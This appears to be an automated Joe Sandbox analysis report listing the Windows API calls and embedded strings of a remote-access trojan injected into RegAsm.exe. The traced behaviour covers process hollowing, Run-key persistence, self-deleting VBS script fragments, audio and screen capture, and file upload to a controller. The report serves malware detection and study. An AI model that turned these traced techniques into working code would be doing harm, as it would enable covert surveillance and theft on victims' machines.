                                                                                              • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041837C
                                                                                              • WriteProcessMemory.KERNEL32 ref: 00418446
                                                                                              • SetThreadContext.KERNEL32(?,00000000), ref: 00418463
                                                                                              • ResumeThread.KERNEL32(?), ref: 00418470
                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418487
                                                                                              • GetCurrentProcess.KERNEL32(?), ref: 00418492
                                                                                              • TerminateProcess.KERNEL32(?,00000000), ref: 004184AD
                                                                                              • GetLastError.KERNEL32 ref: 004184B5
                                                                                              • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                                                              • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                                              • API String ID: 4188446516-3035715614
                                                                                              • Opcode ID: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                                                                                              • Instruction ID: d7ba82c79e3f17b97bd8f2c1aaed993f07984c16d96ff77cb9dc1491e823fc6f
                                                                                              • Opcode Fuzzy Hash: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                                                                                              • Instruction Fuzzy Hash: 69A15FB0604305AFDB209F64DD85B6B7BE8FF48705F00482EF685D6291EB78D844CB59
                                                                                              APIs
                                                                                                • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                                • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D558
                                                                                              • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D56B
                                                                                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D584
                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D5B4
                                                                                                • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                                                                • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32 ref: 0040B902
                                                                                                • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                                                • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D7FF
                                                                                              • ExitProcess.KERNEL32 ref: 0040D80B
                                                                                              Similarity
                                                                                              • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                              • String ID: """, 0$")$8SG$@qF$@qF$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                                              • API String ID: 1861856835-1447701601
                                                                                              • Opcode ID: 5d2ec2f2100dd23cc365e5a044f7fac0ce6a70abfbf1c55e622674ec0d54512f
                                                                                              • Instruction ID: 9f807323933333198641953f201c1fc8368d74e19fdabe041c5449f7db564f80
                                                                                              • Opcode Fuzzy Hash: 5d2ec2f2100dd23cc365e5a044f7fac0ce6a70abfbf1c55e622674ec0d54512f
                                                                                              • Instruction Fuzzy Hash: 8791B0716082005AC315FB62D8529AF77A8AFD4309F10443FB64AA71E3EF7C9D49C65E
                                                                                              APIs
                                                                                                • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                                • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E0
                                                                                              • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1F3
                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D223
                                                                                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D232
                                                                                                • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                                                                • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32 ref: 0040B902
                                                                                                • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                                                • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,636B1986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D44D
                                                                                              • ExitProcess.KERNEL32 ref: 0040D454
                                                                                              Similarity
                                                                                              • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                              • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("$xpF
                                                                                              • API String ID: 3797177996-2483056239
                                                                                              • Opcode ID: 2ee98ea0d0f3863be26643997f5fff8c6a28cb97601397e967d1afa7fe61d675
                                                                                              • Instruction ID: f7f00373e35faeae073ffedb9d5543756e5675edee5c5b567d0d61755fae189b
                                                                                              • Opcode Fuzzy Hash: 2ee98ea0d0f3863be26643997f5fff8c6a28cb97601397e967d1afa7fe61d675
                                                                                              • Instruction Fuzzy Hash: 6181AF716082405AC315FB62D8529AF77A8AFD0308F10483FB58A671E3EF7C9E49C65E
                                                                                              APIs
                                                                                              • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 004124CF
                                                                                              • ExitProcess.KERNEL32(00000000), ref: 004124DB
                                                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412555
                                                                                              • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412564
                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041256F
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00412576
                                                                                              • GetCurrentProcessId.KERNEL32 ref: 0041257C
                                                                                              • PathFileExistsW.SHLWAPI(?), ref: 004125AD
                                                                                              • GetTempPathW.KERNEL32(00000104,?), ref: 00412610
                                                                                              • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0041262A
                                                                                              • lstrcatW.KERNEL32(?,.exe), ref: 0041263C
                                                                                                • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                                                                                              • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041267C
                                                                                              • Sleep.KERNEL32(000001F4), ref: 004126BD
                                                                                              • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004126D2
                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126DD
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 004126E4
                                                                                              • GetCurrentProcessId.KERNEL32 ref: 004126EA
                                                                                              Similarity
                                                                                              • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                                                              • String ID: .exe$8SG$WDH$exepath$open$temp_
                                                                                              • API String ID: 2649220323-436679193
                                                                                              • Opcode ID: 5423d87cc751ed5cfd1d4c8b3581599aeeb643011f75056a7ca0d89747c9c64e
                                                                                              • Instruction ID: ea0e71dbd1735df2f0ffa6a76a18ae54bfb239dee3d1740714ca762960b89f4c
                                                                                              • Opcode Fuzzy Hash: 5423d87cc751ed5cfd1d4c8b3581599aeeb643011f75056a7ca0d89747c9c64e
                                                                                              • Instruction Fuzzy Hash: 4C51C871A00215BBDB10ABA09C99EFE336D9B04715F1041ABF501E71D2EF7C8E858A5D
                                                                                              APIs
                                                                                              • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B1CD
                                                                                              • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B1E1
                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660B4), ref: 0041B209
                                                                                              • PathFileExistsW.SHLWAPI(00000000), ref: 0041B21F
                                                                                              • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B260
                                                                                              • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B278
                                                                                              • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B28D
                                                                                              • SetEvent.KERNEL32 ref: 0041B2AA
                                                                                              • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B2BB
                                                                                              • CloseHandle.KERNEL32 ref: 0041B2CB
                                                                                              • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B2ED
                                                                                              • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B2F7
                                                                                              Similarity
                                                                                              • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                              • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                                                                              • API String ID: 738084811-2094122233
                                                                                              • Opcode ID: e27b3f9eba018f8ca3c324594b7161069c0f951711efb11517c4a8cfdc535e62
                                                                                              • Instruction ID: 904a2ea9ee052b7cd0d2885f28b370526ea16529c5f4723dacad6ab52bd59ce6
                                                                                              • Opcode Fuzzy Hash: e27b3f9eba018f8ca3c324594b7161069c0f951711efb11517c4a8cfdc535e62
                                                                                              • Instruction Fuzzy Hash: 015193B12842056ED314B731DC96ABF779CDB80359F10053FB246621E2EF789D498AAE
                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                                                              • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                                                                              • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                                                                              • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                                                                              • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                                                                              • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                                                                              • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                                                                              • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                                                                              • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                                                                              • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                                                                              • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                                                                              • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                                                                              • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                                                                              Similarity
                                                                                              • API ID: File$Write$Create
                                                                                              • String ID: RIFF$WAVE$data$fmt
                                                                                              • API String ID: 1602526932-4212202414
                                                                                              • Opcode ID: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                                                                              • Instruction ID: e437df56db769974f3bb03b9acf3047b6271bea3308615ff466a61b001f8e6b8
                                                                                              • Opcode Fuzzy Hash: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                                                                              • Instruction Fuzzy Hash: D1413F72644218BAE210DB51DD85FBB7FECEB89B50F40441AFA44D60C0E7A5E909DBB3
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000001,00407688,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000003,004076B0,004752D8,00407709), ref: 004072BF
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004072C8
                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072DD
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004072E0
                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072F1
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004072F4
                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00407305
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00407308
                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 00407319
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0040731C
                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040732D
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00407330
                                                                                              Similarity
                                                                                              • API ID: AddressHandleModuleProc
                                                                                              • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                                              • API String ID: 1646373207-255920310
                                                                                              • Opcode ID: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                                                                              • Instruction ID: 405170eedd050388d8f538cead316ce70cca9a1d875d15a5a69166cce564cbe9
                                                                                              • Opcode Fuzzy Hash: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                                                                              • Instruction Fuzzy Hash: 0A0152A0E4431676D711AF7AAC44D577E9D9E41351311487BB405E2292EEBCE800CD6E
                                                                                              APIs
                                                                                              Similarity
                                                                                              • API ID: _free$EnvironmentVariable
                                                                                              • String ID: >Y
                                                                                              • API String ID: 1464849758-2491313631
                                                                                              • Opcode ID: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                                                                              • Instruction ID: 2409d22e097b45b84bdb59948eb4ebc1cd1141af37d2d18b4001dba56dac1aed
                                                                                              • Opcode Fuzzy Hash: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                                                                              • Instruction Fuzzy Hash: E3D135B1D003006FFB24AF799D82A6B7BA8EF01314F05417FE945A7382EB7D99098759
                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 0040CE42
                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE5B
                                                                                              • CopyFileW.KERNEL32 ref: 0040CF0B
                                                                                              • _wcslen.LIBCMT ref: 0040CF21
                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CFA9
                                                                                              • CopyFileW.KERNEL32 ref: 0040CFBF
                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFFE
                                                                                              • _wcslen.LIBCMT ref: 0040D001
                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040D018
                                                                                              • CloseHandle.KERNEL32 ref: 0040D068
                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000001), ref: 0040D086
                                                                                              • ExitProcess.KERNEL32 ref: 0040D09D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                                              • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$del$open
                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(?), ref: 0041C0C7
                                                                                              • _memcmp.LIBVCRUNTIME ref: 0041C0DF
                                                                                              • lstrlenW.KERNEL32(?), ref: 0041C0F8
                                                                                              • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C133
                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C146
                                                                                              • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C18A
                                                                                              • lstrcmpW.KERNEL32(?,?), ref: 0041C1A5
                                                                                              • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C1BD
                                                                                              • _wcslen.LIBCMT ref: 0041C1CC
                                                                                              • FindVolumeClose.KERNEL32(?), ref: 0041C1EC
                                                                                              • GetLastError.KERNEL32 ref: 0041C204
                                                                                              • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C231
                                                                                              • lstrcatW.KERNEL32(?,?), ref: 0041C24A
                                                                                              • lstrcpyW.KERNEL32(?,?), ref: 0041C259
                                                                                              • GetLastError.KERNEL32 ref: 0041C261
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                                              • String ID: ?
                                                                                              APIs
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412B08
                                                                                                • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,636B1986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                                                                • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5), ref: 004185B9
                                                                                                • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84), ref: 004185C2
                                                                                              • Sleep.KERNEL32(0000000A,00465E84), ref: 00412C5A
                                                                                              • Sleep.KERNEL32(0000000A,00465E84,00465E84), ref: 00412CFC
                                                                                              • Sleep.KERNEL32(0000000A,00465E84,00465E84,00465E84), ref: 00412D9E
                                                                                              • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E00
                                                                                              • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E37
                                                                                              • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E73
                                                                                              • Sleep.KERNEL32(000001F4,00465E84,00465E84,00465E84), ref: 00412E8D
                                                                                              • Sleep.KERNEL32(00000064), ref: 00412ECF
                                                                                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                              • String ID: /stext "$0TG$0TG$NG$NG
                                                                                              APIs
                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C742
                                                                                              • RegEnumKeyExA.ADVAPI32 ref: 0041C786
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0041CA50
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseEnumOpen
                                                                                              • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                                              APIs
                                                                                              • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D66B
                                                                                              • GetCursorPos.USER32(?), ref: 0041D67A
                                                                                              • SetForegroundWindow.USER32(?), ref: 0041D683
                                                                                              • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D69D
                                                                                              • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D6EE
                                                                                              • ExitProcess.KERNEL32 ref: 0041D6F6
                                                                                              • CreatePopupMenu.USER32 ref: 0041D6FC
                                                                                              • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D711
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                              • String ID: Close
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _free$Info
                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00408D1E
                                                                                              • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D56
                                                                                              • __aulldiv.LIBCMT ref: 00408D88
                                                                                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                              • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408EAB
                                                                                              • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408EC6
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00408F9F
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00408FE9
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00409037
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                                                              • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                                                                              APIs
                                                                                              • Sleep.KERNEL32(00001388), ref: 0040A77B
                                                                                                • Part of subcall function 0040A6B0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6E6
                                                                                                • Part of subcall function 0040A6B0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                                                                • Part of subcall function 0040A6B0: Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                                                                • Part of subcall function 0040A6B0: CloseHandle.KERNEL32(00000000), ref: 0040A729
                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A7B7
                                                                                              • GetFileAttributesW.KERNEL32(00000000), ref: 0040A7C8
                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7DF
                                                                                              • PathFileExistsW.SHLWAPI(00000000), ref: 0040A859
                                                                                                • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466478,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A962
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                              • String ID: 8SG$8SG$pQG$pQG$PG$PG
                                                                                              APIs
                                                                                              • ___free_lconv_mon.LIBCMT ref: 0045138A
                                                                                                • Part of subcall function 00450582: _free.LIBCMT ref: 0045059F
                                                                                                • Part of subcall function 00450582: _free.LIBCMT ref: 004505B1
                                                                                                • Part of subcall function 00450582: _free.LIBCMT ref: 004505C3
                                                                                                • Part of subcall function 00450582: _free.LIBCMT ref: 004505D5
                                                                                                • Part of subcall function 00450582: _free.LIBCMT ref: 004505E7
                                                                                                • Part of subcall function 00450582: _free.LIBCMT ref: 004505F9
                                                                                                • Part of subcall function 00450582: _free.LIBCMT ref: 0045060B
                                                                                                • Part of subcall function 00450582: _free.LIBCMT ref: 0045061D
                                                                                                • Part of subcall function 00450582: _free.LIBCMT ref: 0045062F
                                                                                                • Part of subcall function 00450582: _free.LIBCMT ref: 00450641
                                                                                                • Part of subcall function 00450582: _free.LIBCMT ref: 00450653
                                                                                                • Part of subcall function 00450582: _free.LIBCMT ref: 00450665
                                                                                                • Part of subcall function 00450582: _free.LIBCMT ref: 00450677
                                                                                              • _free.LIBCMT ref: 0045137F
                                                                                                • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                              • _free.LIBCMT ref: 004513A1
                                                                                              • _free.LIBCMT ref: 004513B6
                                                                                              • _free.LIBCMT ref: 004513C1
                                                                                              • _free.LIBCMT ref: 004513E3
                                                                                              • _free.LIBCMT ref: 004513F6
                                                                                              • _free.LIBCMT ref: 00451404
                                                                                              • _free.LIBCMT ref: 0045140F
                                                                                              • _free.LIBCMT ref: 00451447
                                                                                              • _free.LIBCMT ref: 0045144E
                                                                                              • _free.LIBCMT ref: 0045146B
                                                                                              • _free.LIBCMT ref: 00451483
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 0041A04A
                                                                                              • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 0041A07C
                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A108
                                                                                              • Sleep.KERNEL32(000003E8), ref: 0041A18E
                                                                                              • GetLocalTime.KERNEL32(?), ref: 0041A196
                                                                                              • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A285
                                                                                              • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                              • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                                                                                              APIs
                                                                                                • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                                • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                                • Part of subcall function 00413733: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000), ref: 0041374F
                                                                                                • Part of subcall function 00413733: RegQueryValueExA.ADVAPI32 ref: 00413768
                                                                                                • Part of subcall function 00413733: RegCloseKey.ADVAPI32(00000000), ref: 00413773
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D894
                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D9F3
                                                                                              • ExitProcess.KERNEL32 ref: 0040D9FF
                                                                                              • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
